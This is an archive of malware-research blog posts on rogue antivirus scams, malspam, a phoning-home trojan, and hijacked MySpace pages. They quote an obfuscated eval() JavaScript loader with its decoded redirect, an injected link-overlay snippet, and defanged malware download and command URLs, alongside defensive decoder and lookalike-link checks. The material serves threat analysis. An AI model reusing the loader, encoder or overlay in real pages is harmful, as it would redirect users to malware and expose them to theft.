Archive for the 'Social Engineering' Category

11 May

“Farrah Fawcett dead” search leads to malware installation

I stumbled upon another website intended to convince the user that they are infected so that they will install a fake anti-malware program. This time, searching for the terms ‘farrah fawcett dead’ revealed the website responsible, even though we know Farrah Fawcett is not dead. This is a fairly typical redirection technique: the user must arrive by referral from a Google search for the redirection to complete. Continue below to see screenshots and additional information on the sites in question.

When you click on the second link shown in the picture above, you will go through the following redirections…

hxxp://test.proudmoores-löwengarde.de/2/pim861.html
-> hxxp://iklopo_automatobb.holdplays.com/index.html?Ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26client%3Dfirefox-a%26rls%3Dorg.mozilla%253Aen-US%253Aofficial%26hs%3DSPJ%26as_q%3D%2Bdead%26as_epq%3DFarrah%2BFawcett%2B%26as_oq%3D%26as_eq%3D%26num%3D10%26lr%3D%26as_filetype%3D%26ft%3Di%26as_sitesearch%3D%26as_qdr%3Dw%26as_rights%3D%26as_occt%3Dany%26cr%3D%26as_nlo%3D%26as_nhi%3D%26safe%3Dimages
-> hxxp://liveavantbrowser2.cn/go.php?id=2009-1541&key=cd19f5036&p=1
-> hxxp://computerscanv1.com/1/?id=2009-1541&smersh=262861b37&back=%3DjQwxDjwMgQMMI%3DM
-> hxxp://computerscanv1.com/download/Install_2009-1.exe

The rogue that is installed on the first go around is Personal Antivirus as shown below. Upon visiting the website multiple times, you will be redirected to other domains distributing different rogue programs.

Whois Record for hxxp://liveavantbrowser2.cn
Whois Record for hxxp://computerscanv1.com

Install_2009-1.exe
Result: 1/40 (2.5%)
MD5: fa620ca09480ce88f5ba2ce8e1bd7293
VirusTotal
Anubis Analysis
hxxp://computerscanv1.com/download/

UPDATED 5:00PM 5/11/09

Looking further into the situation, the screenshot below shows the number of pages involved. There are almost 3,000 pages of keywords intended to lead the user to the malware site, so thousands of keyword combinations could be harvested from these sites.

hxxp://test.proudmoores-löwengarde.de = hxxp://xn--proudmoores-lwengarde-tec.de

Whois Record for hxxp://xn--proudmoores-lwengarde-tec.de

07 Sep

Malspam: Notices from IRS (taxform_for_print.scr)

Here is a piece of malspam we received that purports to be from the IRS, telling you that you are due a refund. The one we got was from taxinform32@taxreducers.com. Simply follow the steps below and the money is yours! (Proceed at your own risk. File available in /pnuemo-malware/.)

Get Your Refund $1927.10 in Just 3 Easy Steps:
1. Print and fill a short tax interview (click to download)
2. Send it online
3. Receive your tax refund

The link included takes you to the following address and file: hxxp://freepromo.cn/documents/taxform_for_print.scr

taxform_for_print.scr
Result: 7/36 (19.45%)
MD5: a705a1df1fc36f696f0eb0fea72870d3
VirusTotal
ThreatExpert Analysis

25 Aug

Antivirus 2008 Pro XP

We came across a new domain name registered at estdomains today. The site may appear entirely legitimate, as it sports a support page, an affiliate page, terms of service, etc., but we can assure you that it is a bad site. Be aware of it and do not download any of the files associated with it! Site: hxxp://antivirus2008proxp.com

What it looks like:

Antivirus 2008 Pro XP

Removal:

Remove this threat with MalwareBytes!

26 Jul

The new wave of malware being sent by email, botnet for hire?

My friend Lithium has been blogging about the recent wave of malware being distributed by email. There seem to be two distinct campaigns right now:

1- Emails that have links to compromised web sites (no attachments)

2- Emails that have a .zip/exe attachment

As I was working on some of our customers’ computers (they got infected when clicking on an email from UPS, even though they never shipped anything…) I realized how bad this actually is. People think that they are being infected by the rogue antivirus programs (antivirus xp, antivirus 2009, 2009 antivirus, aav… whatever they decide to promote) but the origin of the infection itself is much worse than that:

The file received in the email is actually a variant of ZTOP or Sinowal (the name changes depending on the AV vendor). These trojans have self-update, key logging and remote control capabilities. Once installed, they “phone home” to download updated commands, and they do this periodically.

I ran one of them in one of my virtual machines. For a few seconds nothing happened, and I was even tempted to run it again. Then the trojan connected to Russia (hxxp://blatundalqik.ru/panama/odessa.bin) and downloaded new instructions. Immediately, my virtual machine began closing applications, and before it restarted on its own the desktop background changed to the popular “your computer is infected”.

Once the computer restarted, I got one of the variants of xp antivirus running and my real antivirus was just dead. Constant warnings were coming from the task bar. I have seen these warnings hundreds of times. They are annoying, but usually they are not dangerous. This time it is different.

What actually happened is that the trojan had installed itself (ntos.exe, crypts.dll, the wnspoem folder and the video/audio.dll files) and, after calling home, it was ordered to install xp antivirus. They ordered it to install xp antivirus the same way they could have ordered it to silently monitor the user’s browsing and capture any bank or credit card information. Tomorrow they may decide that they need spamming computers, or to DoS a company… all they have to do is change the configuration file. All the infected zombies will follow orders!

Once ntos.exe and crypts.dll are installed on a computer, the computer no longer belongs to the user. Using rootkit techniques, the files hide themselves from the user, and only advanced rootkit detectors will be able to reveal the real problem. The trojan also runs from a temporary file in the temp folder, while crypts.dll checks that the registry entries required to load it on restart are still present. The computer is now part of a botnet, another zombie to be used as needed.

About the xp antivirus infection? It’s annoying, and you may have to fix a few registry entries to regain full desktop functionality, but unless you go and buy their product they are more or less harmless (at least from a technical point of view; I’m sure the user will see that as worse than having a silent trojan).

Only the people controlling the hxxp://blatundalqik.ru server will know the actual extent of the infection. Besides the pop-ups and attempts to get your credit card information, the trojan could be recording your every keystroke, logging your visits to pay your bills, even taking screenshots of your applications, while all your confidential information is conveniently backed up on a server in Russia, should it ever be needed by someone (other than you).

The flood of xp antivirus and similar calls to the antivirus companies also has the effect of saturating their resources: they have to dedicate more and more time to manual removal of infections to keep the customer happy, while the real malicious code lurks in the background, undetected.


26 Jul

More malicious search engine results…

This was quite interesting. One of my co-workers just learned that there is a malicious HTML page with his name on it! When I downloaded the page we realized that it was not a targeted attack, but a different variant of the malicious pages I reported in my MSN malicious results post.

This server actually had 3179 other HTML pages, each one with a name starting with Ryan-. The bad guys probably used a robot to collect information from web pages.

The script looks like the one reported before:

function zrwe(yry,dtj){if(!dtj){dtj='SDedpfE96wCVaFkzrvK4;JhRtHNyo21{LsTn}-I+&38?QAucjlbGW*XBgmZ).Pq0';}var y;var OR='';for(var vadz=0;vadz<yry.length;vadz+=4){y=(dtj.indexOf(yry.charAt(vadz))&63)<<18|(dtj.indexOf(yry.charAt(vadz+1))&63)<<12|(dtj.indexOf(yry.charAt(vadz+2))&63)<<6|dtj.indexOf(yry.charAt(vadz+3))&63;OR+=String.fromCharCode((y&16711680)>>16,(y&65280)>>8,y&255);}eval(OR.substring(0,OR.length-3));}zrwe('2X-uHEPBVIlctXfWNhPuzhJutXP}HJJKKKLTN9vWod&cVB2B2bmcyIl3yIJ}HRv-tBrutXPAVX-uVIF+N4.Bw+vGNG*82hlmVRvsoXQWVR6gFT*3Hda*VRrlke*ctI.gNTHW1RD-zhjIoXJcoIJIzK6?HhmnyXv-JJwwrXPAoEPuHhmWCEvctBJAHhmWV+w-HIJboIJbCKQTw+DsoIfAHRv-onW}NXJm2XPbHeHGH4W}oX;I2R6PaKH6JfvrR*wfv}JKvJ6P6TA-yIFcHEJJ;}-dyX*jyXm-y+r&HEPn2h*-y+ruJJwaCKQTwIv-HIf*y9v{NXJm2XPbHd*thfLTC4QL6eSL6SSS');

And it translates into:

window.location=encodeURI("hxxp://www.onlinedetect.com/in.cgi?7&tsk=july-task4-r86-id35-t18-obo8j&type=l&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=XXX");
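To analyse such a page without executing it, here is an added re-implementation of the zrwe() decoder (example code written for this article, not taken from the original post or the malicious page) that returns the decoded text instead of passing it to eval(), together with a matching encoder, constructed here, so the decoder can be checked against a known string:

```javascript
// Defanged re-implementation of zrwe(): same 64-symbol alphabet, same
// four-symbols-to-three-bytes unpacking, same "drop the last three bytes"
// step, but the result is RETURNED rather than handed to eval().
const ZRWE_ALPHABET =
  'SDedpfE96wCVaFkzrvK4;JhRtHNyo21{LsTn}-I+&38?QAucjlbGW*XBgmZ).Pq0';

function zrweDecode(payload, alphabet = ZRWE_ALPHABET) {
  let out = '';
  for (let i = 0; i < payload.length; i += 4) {
    // Four symbols, each looked up in the alphabet and masked to 6 bits,
    // are packed into one 24-bit word (a custom base64 variant).
    const y =
      ((alphabet.indexOf(payload.charAt(i)) & 63) << 18) |
      ((alphabet.indexOf(payload.charAt(i + 1)) & 63) << 12) |
      ((alphabet.indexOf(payload.charAt(i + 2)) & 63) << 6) |
      (alphabet.indexOf(payload.charAt(i + 3)) & 63);
    // ...and unpacked into three bytes of the hidden script.
    out += String.fromCharCode((y & 0xff0000) >> 16, (y & 0xff00) >> 8, y & 0xff);
  }
  // The original discards the final three bytes before eval(); keep that step.
  return out.substring(0, out.length - 3);
}

// Matching encoder, constructed here only so the decoder can be exercised on
// a known string (the malicious page ships just the decoder). Assumes 8-bit
// input characters, which is all the decoder can reproduce anyway.
function zrweEncode(text, alphabet = ZRWE_ALPHABET) {
  let padded = text;
  while (padded.length % 3 !== 0) padded += ' ';  // pad to whole 3-byte groups
  padded += '\0\0\0';                              // the three bytes zrwe() strips
  let enc = '';
  for (let i = 0; i < padded.length; i += 3) {
    const y = (padded.charCodeAt(i) << 16) |
              (padded.charCodeAt(i + 1) << 8) |
              padded.charCodeAt(i + 2);
    enc += alphabet[(y >> 18) & 63] + alphabet[(y >> 12) & 63] +
           alphabet[(y >> 6) & 63] + alphabet[y & 63];
  }
  return enc;
}

// Constructed sample: a redirect line of the same shape as the decoded payload.
const SAMPLE = 'window.location="hxxp://x.invalid/";';
```

Feeding the payload quoted above to zrweDecode() yields the window.location line the post shows, without the redirect ever running.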

The redirection has changed to a different server:

hxxp://www.onlinedetect.com/in.cgi?7&tsk=july-task4-r86-id35-t18-obo8j&type=l&seoref=

Right now this is directing you to antivirus2008scanner.com, one of the many rogue antivirus variants on the market. scan.wspscanner.com is another possible destination.

How difficult is it to get to one of those pages?


24 Jul

Hillary and Obama are gay. President Bush killed… What’s next?

Hillary and Obama are gay. President Bush killed in Afghan bombing…What’s Next?

We do not mean to bore you with the same old malspam posts every day but after viewing this last e-mail I got to thinking…

What will the next threat be once everyone realizes that almost all e-mail requesting the user to watch a video is malware? What is the next step for the malware creators? Will exploits increasingly become the delivery method of choice? Will site hijacking move to the front of the line? Will legitimate stories on social media sites like digg, reddit, or twitter unknowingly compromise the users’ security?

We are starting to see that in 2009 many security vendors are tightening the belt on the machine they once had control of 10 years ago.

Assuming that the industry’s effort in 2009 is not futile, what will the new pressure create? My honest opinion is that the malware will continue to get smaller, more efficient, and even less intrusive than it already is. Rogue anti-malware products replaced with stealthier cousins, perhaps.

Only a few things remain certain. The criminals still need our credit card numbers, social security numbers, and any other sensitive data that can be sold on the black market, and social engineering with stealth malware will remain the easiest way to obtain such data.

Hoaxes use weaknesses in human behaviour to ensure they are replicated and distributed. In other words, hoaxes prey on the Human Operating System.  -Stewart Kirkpatrick

I am interested in hearing your opinion.  Leave me a message in the comments or just e-mail me at lithium@malwaredatabase.net and we can talk about it.


24 Jul

MySpace infected pages distributing ZLOB

Over the last few weeks I have seen a few infected MySpace pages: pages from regular users that get “corrupted” by malicious visitors. The attacker inserts an iframe into one of the posts on the page, turning most of the page into a huge hyperlink to a malicious site.

This is an example of the code that gets inserted:

<.a ggg= </ggg href="<hxxp://profile.myspace.com.index.cfm.fuseaction=user.viewprofile&friendid=.16658764.tk>" style="position:absolute; top:0px;background-repeat:no-repeat;left:0px; height:860px;width:1263px;background-image:url( <http://x.myspace.com/images/clear.gif);> background-position:left;">

Take a closer look at the link itself:

hxxp://profile.myspace.com.index.cfm.fuseaction=user.viewprofile&friendid=.16658764.tk

It looks just like any other MySpace link, but pay closer attention: there are no “/” characters! There should have been one after myspace.com and before index.cfm. Without the slash, everything up to the end of the string is the host name, so the real domain of the page is 16658764.tk, far different from what they want the user to believe it is. A regular user will not notice the difference, and if he clicks on the hot area of the page he will end up landing here:

hxxp://myspacelogin-error900.freehostia.com/myspace.php
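As an added illustration (not part of the original post), the check below extracts the host the browser would actually connect to and compares it with the domain a reader sees at the start of the link. It uses a small hand-written host extractor rather than the URL class, because the lookalike host contains ‘=’ and ‘&’, and it assumes a two-label registrable domain, which is enough for .com and .tk:

```javascript
// Return the host part of a link: strip the scheme (the post uses the
// defanged "hxxp" prefix), keep everything up to the first '/', '?' or '#',
// then drop any userinfo and port.
function realHost(link) {
  const afterScheme = link.replace(/^[a-z]+:\/\//i, '');
  let authority = afterScheme.split(/[/?#]/)[0];
  authority = authority.replace(/^.*@/, '').replace(/:\d+$/, '');
  return authority.toLowerCase();
}

// Registrable domain = last two labels. Multi-level suffixes such as .co.uk
// would need a public-suffix list; not needed for .com and .tk here.
function registrableDomain(host) {
  const labels = host.split('.').filter(Boolean);
  return labels.slice(-2).join('.');
}

// Compare the domain the user reads at the start of the link with the one the
// browser actually resolves: both present but different is the lookalike trick.
function checkLookalike(link, expectedDomain) {
  const host = realHost(link);
  const realDomain = registrableDomain(host);
  return {
    host,
    realDomain,
    isLookalike: realDomain !== expectedDomain && host.includes(expectedDomain),
  };
}

// Constructed inputs: the injected link quoted in the post, and the genuine
// form of a MySpace profile URL with the slashes where they belong.
const INJECTED =
  'hxxp://profile.myspace.com.index.cfm.fuseaction=user.viewprofile&friendid=.16658764.tk';
const GENUINE =
  'http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=16658764';
```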

The MySpace user will most likely install the “new MySpace object browser”, but instead he or she will be agreeing to install a new variant of ZLOB. This means lots of pop-ups and constant warnings about the computer being infected (hey, but give us your money and we’ll clean it for you with our super-duper antivirus)…

There is no good way of getting out of that page. Either you accept the download, or you must kill your Internet Explorer. If you select Cancel you’ll be put in a “cancel, are you sure, ok, cancel” loop. Just use Task Manager and kill the browser.

We have downloaded THOUSANDS of samples of ZLOB from that location, each one slightly different to make life more difficult for the AV vendors.

Be careful. Always double check your links and do not accept any “free updates” from suspicious sites.

22 Jul

New Malspam: Jay Leno refuses to quit (flashcodecinstall_13_31.exe)

We’ve been receiving more malspam with current events as the subject, but today it is pushing a different file. I have compiled a list of the subjects/bodies of the malspam along with a list of the domains hosting the malware.

These sites supposedly show a video, but when the page loads, it uses JavaScript to prompt the user to download flashcodecinstall_13_31.exe.

00.html -> dnd.js -> master.js -> flashcodecinstall_13_31.exe

The malware reported here is available in our repository. To find the lists of malspam and domains, read more.
